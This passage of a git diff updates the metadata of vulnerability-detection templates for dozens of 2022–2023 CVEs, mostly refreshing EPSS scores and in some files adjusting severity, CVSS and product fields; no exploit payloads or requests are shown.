b/http/cves/2022/CVE-2022-44290.yaml index 2e1e92cc50..9bd0b7741b 100644 --- a/http/cves/2022/CVE-2022-44290.yaml +++ b/http/cves/2022/CVE-2022-44290.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-44290 cwe-id: CWE-89 - epss-score: 0.01129 - epss-percentile: 0.82975 + epss-score: 0.01189 + epss-percentile: 0.83572 cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44291.yaml b/http/cves/2022/CVE-2022-44291.yaml index 5382d5172d..da374bba95 100644 --- a/http/cves/2022/CVE-2022-44291.yaml +++ b/http/cves/2022/CVE-2022-44291.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-44291 cwe-id: CWE-89 - epss-score: 0.01129 - epss-percentile: 0.82975 + epss-score: 0.01189 + epss-percentile: 0.83572 cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4447.yaml b/http/cves/2022/CVE-2022-4447.yaml index 92768c42fa..c271f68b3c 100644 --- a/http/cves/2022/CVE-2022-4447.yaml +++ b/http/cves/2022/CVE-2022-4447.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4447 cwe-id: CWE-89 - epss-score: 0.03843 - epss-percentile: 0.90944 + epss-score: 0.03134 + epss-percentile: 0.9009 cpe: cpe:2.3:a:fontsy_project:fontsy:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44877.yaml b/http/cves/2022/CVE-2022-44877.yaml index 1ea4d7fc78..c17330db7f 100644 --- a/http/cves/2022/CVE-2022-44877.yaml +++ b/http/cves/2022/CVE-2022-44877.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-44877 cwe-id: CWE-78 - epss-score: 0.97436 - epss-percentile: 0.99935 + epss-score: 0.97451 + epss-percentile: 0.99949 cpe: cpe:2.3:a:control-webpanel:webpanel:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml index d053e1a159..665ac7b05a 100644 --- a/http/cves/2022/CVE-2022-44944.yaml +++ b/http/cves/2022/CVE-2022-44944.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-44944 cwe-id: CWE-79 epss-score: 0.00091 - epss-percentile: 0.38462 + epss-percentile: 0.38514 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44946.yaml b/http/cves/2022/CVE-2022-44946.yaml index f57af029c1..378bbc0972 100644 --- a/http/cves/2022/CVE-2022-44946.yaml +++ b/http/cves/2022/CVE-2022-44946.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-44946 cwe-id: CWE-79 epss-score: 0.00091 - epss-percentile: 0.38462 + epss-percentile: 0.38514 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml index 3805a9edd6..6dd451c295 100644 --- a/http/cves/2022/CVE-2022-44947.yaml +++ b/http/cves/2022/CVE-2022-44947.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-44947 cwe-id: CWE-79 epss-score: 0.00109 - epss-percentile: 0.43344 + epss-percentile: 0.43407 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml index 9c7d0ab15c..1dc73ff6db 100644 --- a/http/cves/2022/CVE-2022-44948.yaml +++ b/http/cves/2022/CVE-2022-44948.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-44948 cwe-id: CWE-79 epss-score: 0.00091 - epss-percentile: 0.38462 + epss-percentile: 0.38514 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml index efbd276236..1799ec2fd4 100644 --- a/http/cves/2022/CVE-2022-44949.yaml +++ b/http/cves/2022/CVE-2022-44949.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-44949 cwe-id: CWE-79 epss-score: 0.00091 - epss-percentile: 0.38462 + epss-percentile: 0.38514 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml index bb4d95ad9c..96d192c63b 100644 --- a/http/cves/2022/CVE-2022-44950.yaml +++ b/http/cves/2022/CVE-2022-44950.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-44950 cwe-id: CWE-79 epss-score: 0.00091 - epss-percentile: 0.38462 + epss-percentile: 0.38514 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml index 8510ec7790..1caa0f8ff6 100644 --- a/http/cves/2022/CVE-2022-44951.yaml +++ b/http/cves/2022/CVE-2022-44951.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-44951 cwe-id: CWE-79 epss-score: 0.00091 - epss-percentile: 0.38462 + epss-percentile: 0.38514 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml index 96dabf9637..e2c46d0e13 100644 --- a/http/cves/2022/CVE-2022-44952.yaml +++ b/http/cves/2022/CVE-2022-44952.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-44952 cwe-id: CWE-79 epss-score: 0.07295 - epss-percentile: 0.93352 + epss-percentile: 0.93399 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44957.yaml b/http/cves/2022/CVE-2022-44957.yaml index 85a8c15a67..5aae76bd58 100644 --- a/http/cves/2022/CVE-2022-44957.yaml +++ b/http/cves/2022/CVE-2022-44957.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-44957 cwe-id: CWE-79 epss-score: 0.00091 - epss-percentile: 0.38462 + epss-percentile: 0.38514 cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45037.yaml b/http/cves/2022/CVE-2022-45037.yaml index 455d6f436f..bd194ea29d 100644 --- a/http/cves/2022/CVE-2022-45037.yaml +++ b/http/cves/2022/CVE-2022-45037.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-45037 cwe-id: CWE-79 epss-score: 0.00092 - epss-percentile: 0.38576 + epss-percentile: 0.38648 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45038.yaml b/http/cves/2022/CVE-2022-45038.yaml index ab189775cd..1594f8d711 100644 --- a/http/cves/2022/CVE-2022-45038.yaml +++ b/http/cves/2022/CVE-2022-45038.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-45038 cwe-id: CWE-79 epss-score: 0.00092 - epss-percentile: 0.38576 + epss-percentile: 0.38648 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45354.yaml b/http/cves/2022/CVE-2022-45354.yaml index a2ea276e6e..e1a4a7ae04 100644 --- a/http/cves/2022/CVE-2022-45354.yaml +++ b/http/cves/2022/CVE-2022-45354.yaml @@ -3,7 +3,7 @@ id: CVE-2022-45354 info: name: Download Monitor <= 4.7.60 - Sensitive Information Exposure author: DhiyaneshDK - severity: medium + severity: high description: | The Download Monitor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.7.60 via REST API. This can allow unauthenticated attackers to extract sensitive data including user reports, download reports, and user data including email, role, id and other info (not passwords) impact: | @@ -13,9 +13,20 @@ info: reference: - https://github.com/RandomRobbieBF/CVE-2022-45354 - https://wordpress.org/plugins/download-monitor/ + - https://patchstack.com/database/vulnerability/download-monitor/wordpress-download-monitor-plugin-4-7-60-sensitive-data-exposure-vulnerability?_s_id=cve + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-45354 + epss-score: 0.00553 + epss-percentile: 0.75108 + cpe: cpe:2.3:a:wpchill:download_monitor:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 + vendor: wpchill + product: download_monitor + framework: wordpress shodan-query: html:"/wp-content/plugins/download-monitor/" tags: cve,cve2023,wordpress,wp-plugin,download-monitor,wp diff --git a/http/cves/2022/CVE-2022-45362.yaml b/http/cves/2022/CVE-2022-45362.yaml index 6975a7d795..43ece8017f 100644 --- a/http/cves/2022/CVE-2022-45362.yaml +++ b/http/cves/2022/CVE-2022-45362.yaml @@ -3,7 +3,7 @@ id: CVE-2022-45362 info: name: WordPress Paytm Payment Gateway <=2.7.0 - Server-Side Request Forgery author: theamanrawat - severity: high + severity: medium description: WordPress Paytm Payment Gateway plugin through 2.7.0 contains a server-side request forgery vulnerability. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. remediation: | Update to the latest version of the WordPress Paytm Payment Gateway plugin (2.7.0) or apply the vendor-supplied patch. @@ -13,15 +13,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-45362 - https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-0-server-side-request-forgery-ssrf-vulnerability?_s_id=cve classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 cve-id: CVE-2022-45362 cwe-id: CWE-918 - epss-score: 0.00049 - epss-percentile: 0.15324 + epss-score: 0.00177 + epss-percentile: 0.54846 + cpe: cpe:2.3:a:paytm:payment_gateway:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 + vendor: paytm + product: payment_gateway + framework: wordpress tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,paytm-payments,unauth,oast,paytm http: diff --git a/http/cves/2022/CVE-2022-45365.yaml b/http/cves/2022/CVE-2022-45365.yaml index e86824f695..8c0f27d7ec 100644 --- a/http/cves/2022/CVE-2022-45365.yaml +++ b/http/cves/2022/CVE-2022-45365.yaml @@ -12,14 +12,21 @@ info: - https://patchstack.com/database/vulnerability/stock-ticker/wordpress-stock-ticker-plugin-3-23-2-reflected-cross-site-scripting-xss-vulnerability - https://wordpress.org/plugins/stock-ticker/ - https://nvd.nist.gov/vuln/detail/CVE-2022-45365 + - https://patchstack.com/database/vulnerability/stock-ticker/wordpress-stock-ticker-plugin-3-23-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-45365 cwe-id: CWE-79 + epss-score: 0.00096 + epss-percentile: 0.39837 + cpe: cpe:2.3:a:urosevic:stock_ticker:*:*:*:*:*:wordpress:*:* metadata: verified: "true" max-request: 1 + vendor: urosevic + product: stock_ticker + framework: wordpress publicwww-query: "/wp-content/plugins/stock-ticker/" tags: cve,cve2022,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss diff --git a/http/cves/2022/CVE-2022-45805.yaml b/http/cves/2022/CVE-2022-45805.yaml index 4cbe5dfd11..349df4adad 100644 --- a/http/cves/2022/CVE-2022-45805.yaml +++ b/http/cves/2022/CVE-2022-45805.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-45805 cwe-id: CWE-89 - epss-score: 0.00547 - epss-percentile: 0.7484 + epss-score: 0.00403 + epss-percentile: 0.70919 cpe: cpe:2.3:a:paytm:payment_gateway:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45835.yaml b/http/cves/2022/CVE-2022-45835.yaml index b4c112b4a6..fe730116af 100644 --- a/http/cves/2022/CVE-2022-45835.yaml +++ b/http/cves/2022/CVE-2022-45835.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-45835 cwe-id: CWE-918 epss-score: 0.00404 - epss-percentile: 0.70778 + epss-percentile: 0.70943 cpe: cpe:2.3:a:phonepe:phonepe:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45917.yaml b/http/cves/2022/CVE-2022-45917.yaml index 61f14b9e91..5344d16bc1 100644 --- a/http/cves/2022/CVE-2022-45917.yaml +++ b/http/cves/2022/CVE-2022-45917.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-45917 cwe-id: CWE-601 - epss-score: 0.00163 - epss-percentile: 0.52776 + epss-score: 0.00221 + epss-percentile: 0.60222 cpe: cpe:2.3:a:ilias:ilias:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45933.yaml b/http/cves/2022/CVE-2022-45933.yaml index c382bf0b23..32d3e40313 100644 --- a/http/cves/2022/CVE-2022-45933.yaml +++ b/http/cves/2022/CVE-2022-45933.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-45933 cwe-id: CWE-306 - epss-score: 0.00772 - epss-percentile: 0.79214 + epss-score: 0.00808 + epss-percentile: 0.79835 cpe: cpe:2.3:a:kubeview_project:kubeview:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46020.yaml b/http/cves/2022/CVE-2022-46020.yaml index 80c113a9c7..4543825396 100644 --- a/http/cves/2022/CVE-2022-46020.yaml +++ b/http/cves/2022/CVE-2022-46020.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-46020 cwe-id: CWE-434 - epss-score: 0.01254 - epss-percentile: 0.83982 + epss-score: 0.01665 + epss-percentile: 0.86271 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46071.yaml b/http/cves/2022/CVE-2022-46071.yaml index 43a3808595..eb22b1eea2 100644 --- a/http/cves/2022/CVE-2022-46071.yaml +++ b/http/cves/2022/CVE-2022-46071.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-46071 cwe-id: CWE-89 - epss-score: 0.01501 - epss-percentile: 0.85447 + epss-score: 0.01351 + epss-percentile: 0.84691 cpe: cpe:2.3:a:helmet_store_showroom_site_project:helmet_store_showroom_site:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46073.yaml b/http/cves/2022/CVE-2022-46073.yaml index a3250b1e22..744303cc07 100644 --- a/http/cves/2022/CVE-2022-46073.yaml +++ b/http/cves/2022/CVE-2022-46073.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-46073 cwe-id: CWE-79 - epss-score: 0.00074 - epss-percentile: 0.30504 + epss-score: 0.00086 + epss-percentile: 0.35505 cpe: cpe:2.3:a:helmet_store_showroom_project:helmet_store_showroom:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46169.yaml b/http/cves/2022/CVE-2022-46169.yaml index 0e5a14436e..0b114289a0 100644 --- a/http/cves/2022/CVE-2022-46169.yaml +++ b/http/cves/2022/CVE-2022-46169.yaml @@ -20,9 +20,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-46169 - cwe-id: CWE-78,CWE-74 - epss-score: 0.96678 - epss-percentile: 0.99552 + cwe-id: CWE-74,CWE-78 + epss-score: 0.9654 + epss-percentile: 0.99515 cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46381.yaml b/http/cves/2022/CVE-2022-46381.yaml index 0512135016..73a68cfab2 100644 --- a/http/cves/2022/CVE-2022-46381.yaml +++ b/http/cves/2022/CVE-2022-46381.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-46381 cwe-id: CWE-79 - epss-score: 0.00078 - epss-percentile: 0.32706 + epss-score: 0.001 + epss-percentile: 0.40788 cpe: cpe:2.3:o:niceforyou:linear_emerge_e3_access_control_firmware:0.32-07e:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46443.yaml b/http/cves/2022/CVE-2022-46443.yaml index fb68bfaedb..419a1da19a 100644 --- a/http/cves/2022/CVE-2022-46443.yaml +++ b/http/cves/2022/CVE-2022-46443.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-46443 cwe-id: CWE-89 - epss-score: 0.05563 - epss-percentile: 0.92454 + epss-score: 0.0501 + epss-percentile: 0.92086 cpe: cpe:2.3:a:bangresto_project:bangresto:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46463.yaml b/http/cves/2022/CVE-2022-46463.yaml index 263b0ee3d3..d35b801230 100644 --- a/http/cves/2022/CVE-2022-46463.yaml +++ b/http/cves/2022/CVE-2022-46463.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-46463 cwe-id: CWE-306 - epss-score: 0.01124 - epss-percentile: 0.82936 + epss-score: 0.00995 + epss-percentile: 0.81915 cpe: cpe:2.3:a:linuxfoundation:harbor:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46888.yaml b/http/cves/2022/CVE-2022-46888.yaml index ba9f788eb6..f857406d4c 100644 --- a/http/cves/2022/CVE-2022-46888.yaml +++ b/http/cves/2022/CVE-2022-46888.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-46888 cwe-id: CWE-79 - epss-score: 0.00089 - epss-percentile: 0.3756 + epss-score: 0.00099 + epss-percentile: 0.40602 cpe: cpe:2.3:a:nexusphp:nexusphp:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46934.yaml b/http/cves/2022/CVE-2022-46934.yaml index f3ad1842b8..8c9a3b1e09 100644 --- a/http/cves/2022/CVE-2022-46934.yaml +++ b/http/cves/2022/CVE-2022-46934.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-46934 cwe-id: CWE-79 - epss-score: 0.0332 - epss-percentile: 0.90304 + epss-score: 0.05604 + epss-percentile: 0.92519 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47002.yaml b/http/cves/2022/CVE-2022-47002.yaml index d001969e3e..a6fa0572c3 100644 --- a/http/cves/2022/CVE-2022-47002.yaml +++ b/http/cves/2022/CVE-2022-47002.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-47002 cwe-id: CWE-863 - epss-score: 0.02638 - epss-percentile: 0.89225 + epss-score: 0.03466 + epss-percentile: 0.9056 cpe: cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47003.yaml b/http/cves/2022/CVE-2022-47003.yaml index 7ac6107cfc..54c945f1b9 100644 --- a/http/cves/2022/CVE-2022-47003.yaml +++ b/http/cves/2022/CVE-2022-47003.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-47003 cwe-id: CWE-863 - epss-score: 0.02199 - epss-percentile: 0.8823 + epss-score: 0.02341 + epss-percentile: 0.88647 cpe: cpe:2.3:a:murasoftware:mura_cms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47075.yaml b/http/cves/2022/CVE-2022-47075.yaml index fef0725cb1..30cdae4e27 100644 --- a/http/cves/2022/CVE-2022-47075.yaml +++ b/http/cves/2022/CVE-2022-47075.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-47075 - epss-score: 0.00498 - epss-percentile: 0.73597 + epss-score: 0.00614 + epss-percentile: 0.76423 cpe: cpe:2.3:a:smartofficepayroll:smartoffice:*:*:*:*:web:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47615.yaml b/http/cves/2022/CVE-2022-47615.yaml index adf261f1cd..dd91091fe0 100644 --- a/http/cves/2022/CVE-2022-47615.yaml +++ b/http/cves/2022/CVE-2022-47615.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-47615 cwe-id: CWE-434 - epss-score: 0.00729 - epss-percentile: 0.78556 + epss-score: 0.00815 + epss-percentile: 0.7991 cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47945.yaml b/http/cves/2022/CVE-2022-47945.yaml index 043a617ca5..4e93b8f9c1 100644 --- a/http/cves/2022/CVE-2022-47945.yaml +++ b/http/cves/2022/CVE-2022-47945.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-47945 cwe-id: CWE-22 - epss-score: 0.05499 - epss-percentile: 0.92419 + epss-score: 0.03747 + epss-percentile: 0.90906 cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47966.yaml b/http/cves/2022/CVE-2022-47966.yaml index ac5361b481..281109369b 100644 --- a/http/cves/2022/CVE-2022-47966.yaml +++ b/http/cves/2022/CVE-2022-47966.yaml @@ -20,8 +20,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-47966 - epss-score: 0.97017 - epss-percentile: 0.99684 + epss-score: 0.97119 + epss-percentile: 0.99745 cpe: cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47986.yaml b/http/cves/2022/CVE-2022-47986.yaml index 03723e5ba5..926ce95713 100644 --- a/http/cves/2022/CVE-2022-47986.yaml +++ b/http/cves/2022/CVE-2022-47986.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-47986 cwe-id: CWE-502 - epss-score: 0.92063 - epss-percentile: 0.98699 + epss-score: 0.91399 + epss-percentile: 0.98663 cpe: cpe:2.3:a:ibm:aspera_faspex:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-48012.yaml b/http/cves/2022/CVE-2022-48012.yaml index 7234536207..d04947075b 100644 --- a/http/cves/2022/CVE-2022-48012.yaml +++ b/http/cves/2022/CVE-2022-48012.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-48012 cwe-id: CWE-79 - epss-score: 0.0007 - epss-percentile: 0.29123 + epss-score: 0.00078 + epss-percentile: 0.32323 cpe: cpe:2.3:a:opencats:opencats:0.9.7:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-48165.yaml b/http/cves/2022/CVE-2022-48165.yaml index 424b32df15..0431cda6e8 100644 --- a/http/cves/2022/CVE-2022-48165.yaml +++ b/http/cves/2022/CVE-2022-48165.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-48165 cwe-id: CWE-284 - epss-score: 0.03714 - epss-percentile: 0.90792 + epss-score: 0.04111 + epss-percentile: 0.91271 cpe: cpe:2.3:o:wavlink:wl-wn530h4_firmware:m30h4.v5030.210121:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-48197.yaml b/http/cves/2022/CVE-2022-48197.yaml index c54b2c8245..9abb5bb121 100644 --- a/http/cves/2022/CVE-2022-48197.yaml +++ b/http/cves/2022/CVE-2022-48197.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-48197 cwe-id: CWE-79 - epss-score: 0.00123 - epss-percentile: 0.46308 + epss-score: 0.00193 + epss-percentile: 0.57079 cpe: cpe:2.3:a:yui_project:yui:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4897.yaml b/http/cves/2022/CVE-2022-4897.yaml index 0ec500ca4f..19b88ef1d6 100644 --- a/http/cves/2022/CVE-2022-4897.yaml +++ b/http/cves/2022/CVE-2022-4897.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-4897 cwe-id: CWE-79 epss-score: 0.00289 - epss-percentile: 0.65434 + epss-percentile: 0.65597 cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0099.yaml b/http/cves/2023/CVE-2023-0099.yaml index 9d9fbead8e..5d4bf4dd65 100644 --- a/http/cves/2023/CVE-2023-0099.yaml +++ b/http/cves/2023/CVE-2023-0099.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0099 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29156 + epss-score: 0.00078 + epss-percentile: 0.32657 cpe: cpe:2.3:a:getlasso:simple_urls:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0126.yaml b/http/cves/2023/CVE-2023-0126.yaml index 9f0deb6cbf..b1caba227a 100644 --- a/http/cves/2023/CVE-2023-0126.yaml +++ b/http/cves/2023/CVE-2023-0126.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-0126 cwe-id: CWE-22 - epss-score: 0.03234 - epss-percentile: 0.90191 + epss-score: 0.03857 + epss-percentile: 0.91024 cpe: cpe:2.3:o:sonicwall:sma1000_firmware:12.4.2:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-0236.yaml b/http/cves/2023/CVE-2023-0236.yaml index 63e29101b0..eeb5419c32 100644 --- a/http/cves/2023/CVE-2023-0236.yaml +++ b/http/cves/2023/CVE-2023-0236.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0236 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29167 + epss-score: 0.00078 + epss-percentile: 0.32657 cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0261.yaml b/http/cves/2023/CVE-2023-0261.yaml index 4611c77829..171df44a74 100644 --- a/http/cves/2023/CVE-2023-0261.yaml +++ b/http/cves/2023/CVE-2023-0261.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-0261 cwe-id: CWE-89 - epss-score: 0.06134 - epss-percentile: 0.92764 + epss-score: 0.0753 + epss-percentile: 0.93477 cpe: cpe:2.3:a:ljapps:wp_tripadvisor_review_slider:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml index b26347c6a0..972a9add74 100644 --- a/http/cves/2023/CVE-2023-0297.yaml +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-0297 cwe-id: CWE-94 - epss-score: 0.30712 - epss-percentile: 0.965 + epss-score: 0.35807 + epss-percentile: 0.96764 cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0334.yaml b/http/cves/2023/CVE-2023-0334.yaml index a7e7b5c939..89b2adfc3e 100644 --- a/http/cves/2023/CVE-2023-0334.yaml +++ b/http/cves/2023/CVE-2023-0334.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-0334 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29156 + epss-percentile: 0.29124 cpe: cpe:2.3:a:shortpixel:shortpixel_adaptive_images:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0448.yaml b/http/cves/2023/CVE-2023-0448.yaml index 5969b01c6d..9d2731346e 100644 --- a/http/cves/2023/CVE-2023-0448.yaml +++ b/http/cves/2023/CVE-2023-0448.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0448 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29156 + epss-score: 0.00078 + epss-percentile: 0.32657 cpe: cpe:2.3:a:matbao:wp_helper_premium:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0514.yaml b/http/cves/2023/CVE-2023-0514.yaml index 899ce98679..f2aa8f429b 100644 --- 